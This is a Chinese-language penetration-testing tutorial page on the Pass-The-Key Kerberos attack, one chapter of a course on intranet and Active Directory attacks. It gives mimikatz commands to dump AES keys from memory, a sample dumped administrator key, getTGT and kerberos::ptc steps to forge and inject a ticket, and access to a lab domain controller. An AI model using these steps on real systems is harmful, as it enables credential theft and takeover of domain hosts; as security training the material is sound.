内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
17PTK密钥传递
# 概述 PTK(Pass The Key),中文称之为密钥传递攻击。在PTH密钥传递攻击中,使用的是NTLM-HASH值。PTK密钥传递攻击中使用的是AES256或者AES128的方式,PTK攻击只能用于Kerberos协议认证。 # 原理 在kerberos协议中 PTK攻击原理 AS-REQ(AS-requests)主要包含用户的身份信息,由客户端发送给AS的数据包,其中有几个重要信息: - PA-DATA pA-ENC-TIMESTAMP:使用用户的hash值或者AES key加密时间戳生成的key PA-DATA pA-PAC-REQUEST:是否包含有pac(PAC 包含用户的SID、用户所在组等信息) - kdc-options:协商字段 - cname:请求的用户名 - realm:域名 - sname:请求的服务名  > AES KEY AES KEY是kerberos协议中所使用的,所以一般域用户才有AES KEY。 AES分为两种 aes256和aes128,本地用户是没有aes key的 > 获取key的值 Mimikatz工具相关命令 ``` privilege::debug sekurlsa::ekeys ``` 没有加入域环境  加入了域环境  # 条件 - 域环境 - 支持aes进行认证 # KB2871997补丁 Microsoft发布了KB2871997补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。 所以,以往的例如:Windows 7,Windows 8,Windows Server 2008R2和Windows Server2012也可以更新该补丁后获得上述安全保护机制。 介绍增强的安全保护机制中有如下部分几点: - 减少存储在内存中的凭据数据 - 支持现代身份验证(Kerberos AES) # 上线 > 概述 PTK本质是一种认证,这种认证不具有攻击性。如果一些特殊账号的key被攻击者获取并利用PTK传递攻击,攻击者可以生成对应账户的 TGT票据,然后将票据导入到内存中,那么就可以访问目标的计算机。 使用getTGT工具申请TGT,将TGT导入到内存中,实现访问目标计算机,后续配合计划任务、添加服务等工具就可进行CS上线。 > 操作 1、使用mimikatz工具获取aes key值 ``` privilege::debug log sekurlsa::ekeys ``` 提示:在获取key值之前可以生成日志文件,便于查看。  ``` administrator的key值为a6f84b64a0e722cd6bbff472a56d30132f9459f07e7d4a558a1c726ddba1f14f ``` 2、生成TGT 使用getTGT工具进行生成 ``` getTGT.exe 域名/用户名 -aesKey key值 ``` ``` getTGT.exe xbxaq.com/administrator -aesKey a6f84b64a0e722cd6bbff472a56d30132f9459f07e7d4a558a1c726ddba1f14f ```  执行成功之后,会生成一个.ccache的文件  3、将TGT注入到内存中 使用mimikatz工具  ``` Kerberos::ptc 票据名字 ``` ``` mimikatz kerberos::ptc administrator.ccache ```  查看票据 ``` mimikatz kerberos::list ```  4、访问域控上的c盘  接下来就是接合copy、计划任务、添加服务等技术使得目标机器上线。
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码